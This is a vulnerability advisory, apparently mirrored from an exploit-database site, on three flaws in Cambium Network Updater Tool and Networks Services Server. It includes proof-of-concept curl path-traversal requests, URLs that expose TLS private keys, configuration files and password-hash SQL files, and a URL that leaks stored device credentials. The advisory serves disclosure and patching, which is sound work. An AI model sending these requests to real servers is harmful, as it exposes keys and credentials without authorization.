Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cambium Multiple Vulnerabilities

🗓️ 27 Nov 2017 00:00:00Reported by botType 
zdt
 zdt🔗 0day.today👁 96 Views

Cambium Network Updater Tool and Networks Services Server have multiple vulnerabilities including unauthenticated file path traversal, unauthenticated access control bypass, and capture of credentials for device discovery

Code
Cambium Multiple Vulnerabilities

Vulnerabilities Summary

The following advisory describes three (3) vulnerabilities found in Cambium Network Updater Tool and Networks Services Server.

The Network Updater Tool is “a free-of-charge tool that applies packages to upgrade the device types that the release notes for the release that you are using list as supported. Because this tool is available, an operator does not need to visit each module in the network or even each AP where they would otherwise use the SM Autoupdate capability of the radios”

The Cambium Networks Services (CNS) Server is “a network management application provided by Cambium Networks to manage ePMP devices.”

The vulnerabilities found in Cambium products are:

    Cambium Network Updater Tool (CNUT) – Unauthenticated File Path Traversal
    Cambium Networks Services Server (CNSS) – Unauthenticated Access Control Bypass
    Cambium Networks Services Server (CNSS) – Capture credentials for Device Discovery

Credit

An independent security researcher, Karn Ganeshen, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response

Cambium has released patches to address those vulnerabilities.

For more details: https://help.endian.com/hc/en-us/articles/115012996087 – Support Case 131840
Vulnerabilities details
Cambium Network Updater Tool Unauthenticated File Path Traversal

When Cambium Network Updater Tool is started, it runs a web server on HTTP(S) port 80/443. Cambium Network Updater Tool is a Java application. The web server does not perform strict input validation, and uses input data for filesystem operation.

Therefore, it is possible for an un-authenticated user to read arbitrary files off of the file system by issuing the following request:

curl http://IP/../../path/to/file

proof of Concept

The following request can be used to read the Windows win.ini file:

curl http://IP/../../windows/win.ini

The server will response with:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

When submitting the crafted url via the browser, the forward slash (/) character needs to be encoded. The url will be: http://IP/..%2F..%2Fwindows/win.ini
Cambium Networks Services Server Unauthenticated Access Control Bypass

Cambium Networks Services Server does not implement strict access control. An unauthenticated, remote user can therefore, access the root-, sub-directories, and sensitive configuration files, directly from the server.
Proof of Concept

An unauthenticated attacker can access to the following folders:

Apache

http://IP/httpd.conf
http://IP/windows/apache2/conf/server.key
http://IP/windows/apache2/conf/server.pem
http://IP/windows/apache2/conf/httpd.conf

PHP

http://IP/stack/php/php.ini
http://IP/windows/php/php.ini

Postgresql

http://IP/stack/postgresql/data/pg_hba.conf
http://IP/stack/postgresql/data/postgresql.conf

Logs

http://IP/logs/

Access User Hashes

http://IP/scripts/cnss_test_users.sql
http://IP/scripts/cnss_seed_users.sql

These files contain login names and password hashes for the application users.
Cambium Networks Services Server (CNSS) – Capture credentials for Device Discovery

CNSS is used for discovering various other Cambium devices such as ePMP, and managing all deployed units centrally. In order to discover and access the devices, it relies upon SNMP (v2c) community strings and login credentials.

The CNSS application has 2 roles – administrators, and users. An ‘admin’ has full access to the application. A user in ‘users’ group has restricted access to functions in the application.

An admin user can access & make changes to default configuration for device discovery

The non-administrative account – ‘user’ – cannot access ‘Discover’ function configuration

However, it is possible for a ‘user’ to capture this configuration – default login credentials and SNMP strings for other devices – by accessing the following url:

http://ip/services/finder/admin/index.php

As seen above, SNMP strings & default admin login credentials are stored in clear-text


#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Nov 2017 00:00Current
7.1High risk
Vulners AI Score7.1
cambiumvulnerabilitiesnetwork updater toolnetwork services serverunauthenticated file path traversalaccess control bypassdevice discovery.
96